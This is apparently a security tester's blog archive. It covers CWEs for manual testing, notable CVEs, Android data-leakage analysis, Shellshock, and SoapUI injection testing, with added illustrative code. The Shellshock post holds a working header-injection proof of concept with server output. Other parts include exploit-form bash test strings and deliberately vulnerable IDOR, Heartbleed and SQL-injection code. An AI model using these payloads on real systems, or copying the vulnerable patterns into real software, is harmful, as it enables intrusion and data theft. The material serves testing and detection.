17 Jan 2016

CWEs to test manually

Vulnerabilities that scanners don't (always) detect reliably and that warrant a manual test after the automated scan:
  • CWE-285 Improper Authorization
  • CWE-306 Missing Authentication for Critical Function
  • CWE-311 Missing Encryption of Sensitive Data [A06]
  • CWE-352 Cross-Site Request Forgery (CSRF) [A08]
  • CWE-434 Unrestricted Upload of File with Dangerous Type
  • CWE-798 Use of Hard-coded Credentials  
OWASP Top 10 (2013)
  • A02 Broken Authentication and Session Management
  • A04 Insecure Direct Object References 
  • A05 Security Misconfiguration
  • A06 Sensitive Data Exposure
  • A08 Cross-Site Request Forgery (CSRF)
  • A10 Unvalidated Redirects and Forwards
Those that are less applicable (everywhere) or less verifiable via black-box methods:
  • CWE-494 Download of Code Without Integrity Check
  • CWE-732 Incorrect Permission Assignment for Critical Resource
  • CWE-754 Improper Check for Unusual or Exceptional Conditions
  • CWE-770 Allocation of Resources Without Limits or Throttling 
  • CWE-807 Reliance on Untrusted Inputs in a Security Decision
  • [...]
Of course, this is just a generic list. We still need to adapt the approach to the context, validate the scanners' findings (identify false positives, adjust severity/priority based on exposure), try to exploit recent vulnerabilities, try new techniques, etc.
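The two entries at the top of the list (CWE-285 and CWE-306) are found by a differential test rather than by a signature: replay the same request anonymously and as another user and compare against the owner's response. The following is an added example, not code from the post: a deliberately vulnerable WSGI app (login check but no ownership check, i.e. an insecure direct object reference), its hardened twin, and the probe that tells them apart. The session tokens, invoice data and route names are constructed for the example; the apps are called in-process, so nothing is sent over the network.

```python
from http.cookies import SimpleCookie

# Constructed sample data: session tokens and who owns which invoice.
SESSIONS = {"tok-alice": "alice", "tok-bob": "bob"}
INVOICES = {"1001": ("alice", "Invoice 1001: 250.00 EUR"),
            "1002": ("bob", "Invoice 1002: 980.00 EUR")}
TEXT = [("Content-Type", "text/plain")]


def _session_user(environ):
    cookie = SimpleCookie(environ.get("HTTP_COOKIE", ""))
    return SESSIONS.get(cookie["session"].value) if "session" in cookie else None


def _invoice_id(environ):
    path = environ.get("PATH_INFO", "")
    return path[len("/invoice/"):] if path.startswith("/invoice/") else None


def vulnerable_app(environ, start_response):
    """Checks that the caller is logged in, but never that the invoice is theirs (CWE-285 / IDOR)."""
    user, inv = _session_user(environ), _invoice_id(environ)
    if user is None:
        start_response("401 Unauthorized", TEXT)
        return [b"login required"]
    if inv not in INVOICES:
        start_response("404 Not Found", TEXT)
        return [b"no such invoice"]
    start_response("200 OK", TEXT)
    return [INVOICES[inv][1].encode()]


def hardened_app(environ, start_response):
    """Same routes, plus the ownership check that authorization actually requires."""
    user, inv = _session_user(environ), _invoice_id(environ)
    if user is None:
        start_response("401 Unauthorized", TEXT)
        return [b"login required"]
    if inv not in INVOICES:
        start_response("404 Not Found", TEXT)
        return [b"no such invoice"]
    owner, body = INVOICES[inv]
    if owner != user:
        start_response("403 Forbidden", TEXT)
        return [b"not your invoice"]
    start_response("200 OK", TEXT)
    return [body.encode()]


def call(app, path, session=None):
    """Invoke a WSGI app in-process with a constructed environ; returns (status, body)."""
    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": path, "SERVER_NAME": "test",
               "SERVER_PORT": "80", "wsgi.url_scheme": "http"}
    if session:
        environ["HTTP_COOKIE"] = "session=" + session
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status

    body = b"".join(app(environ, start_response))
    return captured["status"], body


def authz_probe(app, path, owner_session, other_session):
    """Differential test: the owner's request replayed anonymously and as a different user.
    'idor' is set when the other user gets the owner's exact response (CWE-285);
    'unauthenticated' when the anonymous request does (CWE-306)."""
    anon = call(app, path)
    owner = call(app, path, owner_session)
    other = call(app, path, other_session)
    return {"anonymous": anon[0], "owner": owner[0], "other": other[0],
            "idor": other == owner,
            "unauthenticated": anon == owner}
```

Run the probe against every object-bearing URL collected during the crawl, with the sessions of two users of the same role; a 200/200 pair with identical bodies is the finding, a 403 (or a 404 that hides existence) is the expected result.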

10 Jan 2016

Important CVEs that have impacted our web apps

A non-exhaustive list of CVEs that have had a major, widespread impact on the security of our web applications.

FREAK - CVE-2015-0204

SSL/TLS vulnerability that allows an attacker to intercept HTTPS connections between vulnerable clients and servers and force them to use weakened (export-grade RSA) encryption, which the attacker can break to steal or manipulate sensitive data. CVE-2015-0204 is the OpenSSL client-side identifier; other affected TLS stacks have their own CVEs, and a server remains part of the problem as long as it still offers RSA_EXPORT cipher suites.

Resources:

LOGJAM - CVE-2015-4000

The TLS protocol 1.2 and earlier, when a DHE_EXPORT ciphersuite is enabled on a server but not on a client, does not properly convey a DHE_EXPORT choice, which allows man-in-the-middle attackers to conduct cipher-downgrade attacks by rewriting a ClientHello with DHE replaced by DHE_EXPORT and then rewriting a ServerHello with DHE_EXPORT replaced by DHE.

Resources:

WinShock - CVE-2014-6321 - MS14-066

Schannel in Microsoft Windows Server allows remote attackers to execute arbitrary code via crafted packets.

Resources:

ShellShock (BashBug) - CVE-2014-6271

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

Resources:

POODLE - CVE-2014-3566

Padding Oracle On Downgraded Legacy Encryption (POODLE). The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack.

Resources:

Heartbleed - CVE-2014-0160

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c.

Resources:
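The Heartbleed description above boils down to one missing bounds check. The following is an added illustration, not code from the post or from OpenSSL: the heartbeat message layout from RFC 6520, the pre-1.0.1g handling that trusts the length field inside the message, and the 1.0.1g check that rejects it. The HEAP constant is a constructed stand-in for whatever happened to follow the record in process memory.

```python
import struct

HEARTBEAT_REQUEST, HEARTBEAT_RESPONSE = 1, 2
MIN_PADDING = 16  # RFC 6520: at least 16 bytes of padding after the payload


def build_heartbeat(payload, claimed_len=None):
    """Heartbeat message: type(1) | payload_length(2) | payload | padding.
    A claimed_len larger than len(payload) is the malformed request Heartbleed used."""
    if claimed_len is None:
        claimed_len = len(payload)
    return struct.pack("!BH", HEARTBEAT_REQUEST, claimed_len) + payload + b"\x00" * MIN_PADDING


def vulnerable_handler(record, heap_after_record):
    """OpenSSL 1.0.1 to 1.0.1f logic: payload_length is taken from the attacker's message and
    that many bytes are copied from the payload start into the response. The real code reads
    past the record on the heap; here heap_after_record plays the role of that memory."""
    hb_type, payload_len = struct.unpack("!BH", record[:3])
    if hb_type != HEARTBEAT_REQUEST:
        return None
    memory = record + heap_after_record
    return (struct.pack("!BH", HEARTBEAT_RESPONSE, payload_len)
            + memory[3:3 + payload_len] + b"\x00" * MIN_PADDING)


def patched_handler(record, heap_after_record):
    """1.0.1g adds the bounds check: silently discard when the claimed length does not fit."""
    hb_type, payload_len = struct.unpack("!BH", record[:3])
    if hb_type != HEARTBEAT_REQUEST:
        return None
    if 1 + 2 + payload_len + MIN_PADDING > len(record):
        return None
    return (struct.pack("!BH", HEARTBEAT_RESPONSE, payload_len)
            + record[3:3 + payload_len] + b"\x00" * MIN_PADDING)


def response_payload(response):
    """Echoed payload of a heartbeat response (what the client gets back)."""
    _, n = struct.unpack("!BH", response[:3])
    return response[3:3 + n]


# Constructed stand-in for process memory adjacent to the record buffer.
HEAP = b"Cookie: session=deadbeef; -----BEGIN RSA PRIVATE KEY-----"
```

A legitimate request (claimed length equal to the real payload) is answered identically by both handlers; only the oversized claim separates them, which is also why the fix could be shipped without a protocol change.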

Others worth mentioning



      References

Threat & Breach Reports 2015


      27 Jan 2015

Choosing Android Apps

A few ideas for criteria when selecting Android apps from the Google Play Store:
1. Search for apps in the Google Play Store and review the detailed permissions (Permissions: View Details), or search by permissions (criterion: permission "INTERNET / Full network access" excluded) using the IzzyOnDroid site.
2. The app must not request more privileges than it needs.
3. When possible, the app should not combine reading of personal data (files, Google accounts, phone number...) with network access (full network access), unless it comes from an authoritative and somewhat trusted source such as Google, Firefox, etc.
4. When the app has a legitimate need to connect to the Internet, it should not have exhibited signs of personal (or business) data leakage: connections to unknown addresses, to analytics/monitoring sites (e.g. flurry.com) or to advertising sites (e.g. admob.com). I run NoRoot Firewall on a test device for a while, pull up the list of connections (IP addresses or domains) and draw my own conclusion. For hosts where only the IP address is known, I use a resource such as robtex.com to investigate further.
5. The app must work well according to my needs (fast, efficient, readable, adaptable). I'd rather pay for an app that does exactly what I need. Unfortunately, few apps outside the Google realm meet the above criteria.

      3 Jan 2015

Data leakage analysis for Android

Below are a few ideas for analyzing the network connections that our Android apps try to initiate, without having to root the device. Tools mentioned: Android Connection Monitor (connection logs), NoRoot Firewall (connection logs and egress traffic control), tcpdump and tshark (DNS response logs) and Robtex (host reputation and role analysis).

The method described below should be considered a first step, to identify which specific app connects to which server. As a second step, the detailed traffic would be analyzed with conventional techniques such as Wireshark, an SSL interception proxy such as mitmproxy, etc. That part is not covered here (yet), but this post gives a very good idea of it.

      Connection Monitor

Start Connection Monitor

Install Connection Monitor on the Android device from Google Play, start the app and select the Connections Log tab:


Export Connection Logs

Let the app run for a while, then export its data by selecting the Settings tab and choosing Export Database and Send:


      NoRoot Firewall

Start NoRoot Firewall

Install NoRoot Firewall (by Greyshirts) from Google Play.

Start NoRoot Firewall, press Start and enable Auto start on boot:

Configure NoRoot Firewall

Configure access for each app in NoRoot Firewall via the Pending Access tab, by selecting each app (do not press Allow or Deny at this point):



Accept or reject each granular network access based on common sense (minimum necessary access) and/or by researching the destination on a site such as Robtex or SANS ISC.



After a few repetitions for the same domains/subnets, configure a generalized rule (but keep the individual entries for future analysis):



Repeat for all installed apps, iteratively, during normal daily usage. Eventually most apps will be configured as intended, allowing or blocking traffic based on domain names and your own research.


The following paragraphs show how to extract the NoRoot Firewall configuration in order to view it on a PC (or even transfer it to another Android device).

Backup data to PC

Turn on USB debugging on the Android device:

Connect a PC to the Android device over USB and use adb (example on macOS). Back up the NoRoot Firewall data; the device then prompts for confirmation (unlock it and press OK). Note that adb backup only captures apps that allow backups (android:allowBackup) and is deprecated on recent Android versions, where apps targeting Android 12 and later are no longer backed up this way:
(macos)$ adb backup -f norootfw.ab app.greyshirts.firewall
       


Extract rules from NoRoot Firewall
Download Android Backup Extractor, then extract the files from the backup:
      (macos)$ java -jar abe.jar unpack norootfw.ab norootfw.tar
      Strong AES encryption not allowed
      Magic: ANDROID BACKUP
      Version: 3
      Compressed: 1
      Algorithm: none

      203264 bytes written to norootfw.tar.
      (macos)$ tar xvf norootfw.tar
      x apps/app.greyshirts.firewall/_manifest
      x apps/app.greyshirts.firewall/f/persistentlog.txt
      x apps/app.greyshirts.firewall/db/db-journal
      x apps/app.greyshirts.firewall/db/db
      x apps/app.greyshirts.firewall/sp/PREF.xml
Extract the data from the NoRoot Firewall database with sqlite3:
      $ cd apps/app.greyshirts.firewall/db
      $ sqlite3 db
      SQLite version 3.7.13 2012-07-17 17:46:21
      Enter ".help" for instructions
      Enter SQL statements terminated with a ";"
      sqlite> .schema
      CREATE TABLE android_metadata (locale TEXT);
      CREATE TABLE app (appName TEXT, pkg1Name TEXT, appType INTEGER, _id INTEGER PRIMARY KEY AUTOINCREMENT );
      CREATE TABLE filter (serverIp TEXT, serverStrType INTEGER, serverPort INTEGER, protocol INTEGER, serverName TEXT, createdData INTEGER, type INTEGER DEFAULT 0, type1 INTEGER DEFAULT 0, appName TEXT, pkgName TEXT, pkg2Name TEXT, pkg3Name TEXT, isPolicy INTEGER, appUid INTEGER, priority INTEGER DEFAULT 0, _id INTEGER PRIMARY KEY AUTOINCREMENT );
      CREATE TABLE pending (serverIp TEXT, serverHost TEXT, serverPort INTEGER, localIp TEXT, localPort INTEGER, protocol INTEGER, serverName TEXT, createdData INTEGER, appName TEXT, allAppName TEXT, pkgName TEXT, pkg2Name TEXT, pkg3Name TEXT, appUid INTEGER, _id INTEGER PRIMARY KEY AUTOINCREMENT );
      CREATE INDEX filter_pkg1 ON filter(pkgName);
      CREATE INDEX filter_pkg2 ON filter(pkg2Name);
      CREATE INDEX filter_pkg3 ON filter(pkg3Name);
      CREATE INDEX pend_pkg1 ON pending(pkgName);
      CREATE INDEX pend_pkg2 ON pending(pkg2Name);
      CREATE INDEX pend_pkg3 ON pending(pkg3Name);


      sqlite> select appName,serverIp,serverPort from filter order by appName;
      Aldiko Premium|*|-1
      Aldiko Premium|static.86.130.76.144.clients.your-server.de|80
      Aldiko Premium|hit-block.opendns.com|443
      Android System|192.168.22.1|7
      Android System|*.cloudfront.net|80
      Android System|cache.google.com|80
      Android System|*|-1
      Calendar|*.1e100.net|443
      Calendar|64.233.*.*|443
      Calendar|64.233.171.95|443
      Calendar|qg-in-f95.1e100.net|443
      [...]


      sqlite> .output filter.txt
      sqlite> select appName,serverIp,serverPort from filter order by appName;


      sqlite> .output dump.sql
      sqlite> .dump

DNS Resolution History

Full list of DNS mappings

To obtain a full list of DNS name to IP address mappings seen on the network, run tcpdump to collect the DNS traffic for a while, then extract the mappings with tshark:
      (Linux OS) # tcpdump -n -i eth1 -w dns1.pcap port 53 &
(wait a few hours)
      (Linux OS) # tshark -nr dns1.pcap -Y "(dns.flags.response == 1) && (dns.qry.type == 1)" -T fields -e dns.qry.name -e dns.resp.addr | head

      Running as user "root" and group "root". This could be dangerous.
      nrdp.nccp.netflix.com    107.21.213.110
      myip.opendns.com    166.62.205.221
      googlemail.l.google.com    74.125.226.21,74.125.226.22
      nrdp.nccp.netflix.com    50.17.199.72
      www.jourzero.com    173.194.68.121
      nrdp.nccp.netflix.com    184.73.164.236
      www.jourzero.com    64.233.171.121
      myip.opendns.com    166.62.205.221
      nrdp.nccp.netflix.com    184.73.248.203
      cdn0.nflximg.net    24.200.246.83,24.200.246.57

Reputation Analysis

      Robtex.com

For my needs, robtex.com has been a very useful tool that aggregates analysis data from various sources (whois, blacklists, DNS, multi-hosting...). Simply going to the main page and initiating a search from the top input form leads to the appropriate details.

You can also use direct URIs such as: http://robtex.com/ip/8.8.8.8.html (IP address lookup) or http://robtex.com/dns/www.hp.com (FQDN lookup).

      There's also a nice little trick described below for getting colored links and details via hovering...

Integration to Robtex

When displaying our analysis results, we can integrate them with Robtex data as described here. This gives active links colored according to reputation, with details shown on hover. The next section shows an example.

Putting it all together

Of course, much of the above could be simplified and automated. For now, I have only done a bit of scripting to output the following sample results, identifying connections that may warrant investigation...

App Name               Host Name                                      IP Address      Port
Aldiko Premium         www.aldiko.co                                  184.168.221.19  80
                       (probably data.flurry.com)                     216.52.203.13   443
                       (probably data.flurry.com)                     74.217.75.110   443
                       static.86.130.76.144.clients.your-server.de    144.76.130.86   80
Google Play Newsstand  bs.serving-sys.com                                             80
iSyncr                 ec2-174-129-19-57.compute-1.amazonaws.com                      443


      NB: if the above IP addresses aren't colored or hovering doesn't work, it may be that the javascript from robtex.com is blocked locally (via something like noscript) or your client is being blacklisted temporarily by the service (i.e. if you're reloading this page too often). If this happens, try later.
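The "bit of scripting" behind the table above is not on the page, so here is an added example of the consolidation step (not the post's own script): it loads firewall rules in the shape of the `filter` table shown earlier, reads the name-to-address lines produced by the tshark command from the DNS section, and joins the two so that bare IP addresses in the rules get a "(probably ...)" host name and tracker domains get flagged. The rules, the tshark lines and the tracker suffix list are constructed for the example; in practice, point sqlite3.connect() at the extracted `db` file and feed the real tshark output.

```python
import sqlite3

# Only the columns of the NoRoot Firewall `filter` table that this script uses.
SCHEMA = """
CREATE TABLE filter (serverIp TEXT, serverPort INTEGER, appName TEXT,
                     _id INTEGER PRIMARY KEY AUTOINCREMENT);
"""

# Constructed sample rules, in the shape of `select appName,serverIp,serverPort from filter`.
SAMPLE_RULES = [
    ("Aldiko Premium", "*", -1),
    ("Aldiko Premium", "216.52.203.13", 443),
    ("Aldiko Premium", "static.86.130.76.144.clients.your-server.de", 80),
    ("Calendar", "*.1e100.net", 443),
    ("Calendar", "64.233.171.95", 443),
    ("iSyncr", "174.129.19.57", 443),
]

# Constructed lines in the format of `tshark ... -T fields -e dns.qry.name -e dns.resp.addr`.
SAMPLE_TSHARK = """\
Running as user "root" and group "root". This could be dangerous.
data.flurry.com\t216.52.203.13,74.217.75.110
qg-in-f95.1e100.net\t64.233.171.95
www.jourzero.com\t173.194.68.121
"""

# Domains the post names as analytics/advertising; extend as needed.
TRACKER_SUFFIXES = ("flurry.com", "admob.com")


def load_rules(rows):
    """In-memory copy of the `filter` table (use sqlite3.connect('db') on the real backup)."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO filter(appName, serverIp, serverPort) VALUES (?,?,?)", rows)
    return db


def parse_tshark_dns(text):
    """Map every answered address back to the query name(s) that resolved to it."""
    ip_to_names = {}
    for line in text.splitlines():
        if "\t" not in line:
            continue  # tshark warnings and other non-field lines
        name, addrs = line.split("\t", 1)
        for ip in addrs.split(","):
            ip_to_names.setdefault(ip.strip(), set()).add(name.strip())
    return ip_to_names


def is_bare_ip(s):
    parts = s.split(".")
    return len(parts) == 4 and all(p.isdigit() for p in parts)


def classify(hostnames):
    if any(h.endswith(s) for h in hostnames for s in TRACKER_SUFFIXES):
        return "analytics/ads"
    return ""


def consolidate(db, ip_to_names):
    """Join rules to DNS history; returns (app, host, ip, port, note) rows."""
    rows = []
    query = "SELECT appName, serverIp, serverPort FROM filter ORDER BY appName, serverIp"
    for app, server, port in db.execute(query):
        if server == "*":
            continue  # catch-all rule, nothing to attribute
        if is_bare_ip(server):
            names = sorted(ip_to_names.get(server, ()))
            if names:
                rows.append((app, "(probably %s)" % "/".join(names), server, port, classify(names)))
            else:
                rows.append((app, "(unknown)", server, port, "needs lookup"))
        else:
            rows.append((app, server, "", port, classify([server])))
    return rows


if __name__ == "__main__":
    table = consolidate(load_rules(SAMPLE_RULES), parse_tshark_dns(SAMPLE_TSHARK))
    for row in table:
        print("%-16s %-45s %-16s %-5s %s" % row)
```

Rows marked "needs lookup" are the ones to take to Robtex; rows marked "analytics/ads" are the candidates for a Deny rule in NoRoot Firewall.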


      29 Sep 2014

      Current Intel on BashBug / Shellshock

      CVEs
      CVE-2014-6271  (1st bug report)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
      GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

      CVE-2014-7169   (2nd bug/variant, aka AfterShock)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169
      GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.

CVE-2014-7186   (3rd bug/variant, found by Red Hat's Florian Weimer)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186
      The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the "redir_stack" issue.

CVE-2014-7187    (4th bug/variant, found by Red Hat's Florian Weimer)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187
      Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the "word_lineno" issue.

CVE-2014-6277   (5th bug/variant, found by Google's Michal Zalewski)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277
      Variant 1. GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.

CVE-2014-6278   (6th bug/variant, found by Google's Michal Zalewski)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278   (reserved, not available yet)
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
      Variant 2. (see Variant 1 CVE-2014-6277 for a description)

      From SANS Advisory Board: Only the first two listed above are patched in “main stream” linux distros. A source code patch is available for the rest if you want to compile bash yourself, but exploitation is a tad harder for the last 4.

      Other Info
      GNU Patch Info
      List for current bash (4.3): http://ftp.gnu.org/gnu/bash/bash-4.3-patches/
      Latest bash patch (027): http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027

      Botnets

      Network Detection (IDS, IPS, WAF)
      • VRT and EmergingThreats posts showing this is being addressed for Snort
      • ...
      Exploits

      Bash Test Strings
      Command line tests to verify proper patching (and to somehow use in our detections):
• Test for the original bug (CVE-2014-6271): env x='() { :;}; echo Not patched' bash -c "echo This is a test."  On a patched bash only the test line is printed.
• Test that functions are no longer imported from arbitrarily named variables (the later patches only import from specially prefixed BASH_FUNC_ variables): foo='() { echo Not patched; }' bash -c foo  On a patched bash, foo is reported as not found.
      • (search for more...)

      25 Sep 2014

      Test pour Shellshock/BashBug | POC for ShellShock / BashBug CVE-2014-6271

      Ref CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

I tried it real quick in a VM and it's easy to inject via the User-Agent and Cookie headers. I didn't get much result via a GET parameter though (either via URL-encoding or by just encoding the spaces), but I just wanted to prove the point to myself quickly... (The CGI interface hands the query string to the script undecoded in QUERY_STRING, so an encoded space never becomes the "() {" prefix that bash looks for; header values, by contrast, are copied verbatim into the HTTP_* variables.)


      Simple CGI Script on a vulnerable server

      /usr/lib/cgi-bin$ cat echo.sh
      #!/bin/bash
      echo -e "Content-type: text/plain\n\n"
      echo "hi ya! Is there a file in /tmp as a result of this?";
      echo "Output from env:"
      env



      GET request from attacker

      GET /cgi-bin/echo.sh HTTP/1.1
      Host: localhost
      Content-Length: 0
      User-Agent: () { :;}; echo Hacked > /tmp/HackedViaUserAgent
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Cookie: () { :;}; echo Hacked > /tmp/HackedViaCookie
      Connection: keep-alive




      GET response received by attacker

      HTTP/1.1 200 OK
      Date: Thu, 25 Sep 2014 23:42:53 GMT
      Server: Apache/2.2.16 (Debian)
      Vary: Accept-Encoding
      Content-Length: 1866
      Keep-Alive: timeout=15, max=100
      Connection: Keep-Alive
      Content-Type: text/plain

      hi ya! Is there a file in /tmp as a result of this?
      Output from env:
      [...]
      HTTP_USER_AGENT=() { :
      }
      HTTP_COOKIE=() { :
      }
      _=/usr/bin/env



      Result on attacked server

      $ ls /tmp/Hacked*
      /tmp/HackedViaCookie /tmp/HackedViaUserAgent
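The request above is also what a detection has to catch: any header (or log field) whose value starts with the bash function-definition marker. The following is an added example, not code from either post: it scans a set of request headers, and Apache combined-format access-log lines, for that marker. The sample headers are the ones from the request above; the log lines are constructed. Bash 4.3 only honoured the exact "() {" prefix at the start of a variable's value, so the header check is anchored there, while the log check is deliberately looser (probes in the wild varied the whitespace and IDS signatures matched anywhere in the packet).

```python
import re

# "() {" with tolerant whitespace; bash itself required exactly "() {" at the start of the value.
MARKER_RE = re.compile(r"\(\)\s*\{")

# Apache combined log format: ip ident user [time] "request" status size "referer" "agent"
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]*)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"\s*$')

# Headers from the GET request in the post above.
SAMPLE_HEADERS = {
    "Host": "localhost",
    "User-Agent": "() { :;}; echo Hacked > /tmp/HackedViaUserAgent",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Cookie": "() { :;}; echo Hacked > /tmp/HackedViaCookie",
    "Connection": "keep-alive",
}

# Constructed access-log lines: a UA probe, a benign request, a Referer probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Sep/2014:23:42:53 +0000] "GET /cgi-bin/echo.sh HTTP/1.1" 200 1866 "-" '
    '"() { :;}; echo Hacked > /tmp/HackedViaUserAgent"',
    '10.0.0.6 - - [25/Sep/2014:23:43:10 +0000] "GET /index.html HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"',
    '10.0.0.7 - - [25/Sep/2014:23:44:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 210 '
    '"() { _; }; /bin/bash -c \'id\'" "curl/7.38.0"',
]


def scan_headers(headers):
    """Names of headers whose value begins with the marker (what bash would act on)."""
    return [name for name, value in headers.items() if MARKER_RE.match(value)]


def scan_access_log(lines):
    """(line_number, client_ip, field) for every log field carrying the marker.
    Lines that do not parse are searched as a whole and reported with field 'raw'."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = CLF_RE.match(line)
        if not m:
            if MARKER_RE.search(line):
                hits.append((n, "?", "raw"))
            continue
        for field in ("request", "referer", "agent"):
            if MARKER_RE.search(m.group(field)):
                hits.append((n, m.group("ip"), field))
    return hits


if __name__ == "__main__":
    print("headers:", scan_headers(SAMPLE_HEADERS))
    print("log hits:", scan_access_log(SAMPLE_LOG))
```

Searching the log only tells you that a probe arrived; whether it succeeded is answered by the CGI script's output or, as in the post, by the file the payload left behind on the server.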

      1 May 2014

      Getting started in web services testing with SoapUI and Mutillidae


I wrote this post to help anyone who wants to start using SoapUI to test the security of (SOAP) web services. We first set up Mutillidae, which includes a few services to test, and then run an SQL injection test.

Apologies, the rest is in English; I don't really have the time to translate it. But a picture is worth a thousand words, isn't it?
______________


This post is meant to help a security tester set up SoapUI and use it against the test web services included in Mutillidae.

      Setting up a local test environment with web services

      Setting up SoapUI

      • Setup SoapUI and create a test project for Mutillidae and load the various Mutillidae WSDL files and setup the associated test suites for each WSDL:
      •  As a simple test, double click getUserInformation and add username and password values as follows: 


      •   Click on the green Submit Request button and wait for the response in the right pane:
       


        Creating a security test

      •   Create a new Security Test:
      • Optionally, add another specific assertion, as demonstrated below.

Note that adding an XPath assertion for injection testing is not always a good idea; at the very least, you must ensure that the assertion covers all legitimate cases. For example, below we add an XPath expression that covers both the normal request (node count = 1) and an empty result set (node count = 0), so that only an unexpected number of nodes fails the assertion.
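To show what that assertion does and does not catch, here is an added example that is not part of the post and does not use SoapUI or Mutillidae's own code: a stand-in SOAP lookup service that builds its SQL by string concatenation (the injectable behaviour under test), the equivalent of the XPath count assertion, and the security test loop. The account table, element names (`getUserInformationResponse`, `account`, `username`) and payload list are constructed for the example.

```python
import sqlite3
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"


def make_db():
    """Constructed sample accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    db.executemany("INSERT INTO accounts VALUES (?,?)",
                   [("admin", "S3cret!"), ("alice", "wonderland"), ("bob", "builder")])
    return db


def vulnerable_lookup(db, username, password):
    # Deliberately injectable: input concatenated into the query, as in the service under test.
    sql = "SELECT username FROM accounts WHERE username='%s' AND password='%s'" % (username, password)
    return [row[0] for row in db.execute(sql)]


def soap_response(usernames):
    env = ET.Element("{%s}Envelope" % SOAP_NS)
    body = ET.SubElement(env, "{%s}Body" % SOAP_NS)
    resp = ET.SubElement(body, "getUserInformationResponse")
    for u in usernames:
        ET.SubElement(ET.SubElement(resp, "account"), "username").text = u
    return ET.tostring(env, encoding="unicode")


def soap_fault(message):
    env = ET.Element("{%s}Envelope" % SOAP_NS)
    body = ET.SubElement(env, "{%s}Body" % SOAP_NS)
    fault = ET.SubElement(body, "{%s}Fault" % SOAP_NS)
    ET.SubElement(fault, "faultstring").text = message
    return ET.tostring(env, encoding="unicode")


def service(db, username, password):
    """The endpoint as SoapUI sees it: a result list, or a Fault when the SQL breaks."""
    try:
        return soap_response(vulnerable_lookup(db, username, password))
    except sqlite3.Error as e:
        return soap_fault(str(e))


def account_count(xml_text):
    return len(ET.fromstring(xml_text).findall(".//account"))


def is_soap_fault(xml_text):
    return ET.fromstring(xml_text).find(".//{%s}Fault" % SOAP_NS) is not None


def xpath_assertion(xml_text):
    """Same check as an XPath assertion on count(//account): 1 (found) or 0 (empty) is legitimate."""
    return account_count(xml_text) in (0, 1)


def run_security_test(db, payloads, password="wrong"):
    """Send each payload as the username; return (payload, reason) for every failed response.
    The count assertion alone would let SQL errors through, hence the extra Fault check."""
    failures = []
    for p in payloads:
        resp = service(db, p, password)
        if is_soap_fault(resp):
            failures.append((p, "SOAP Fault"))
        elif not xpath_assertion(resp):
            failures.append((p, "%d accounts" % account_count(resp)))
    return failures
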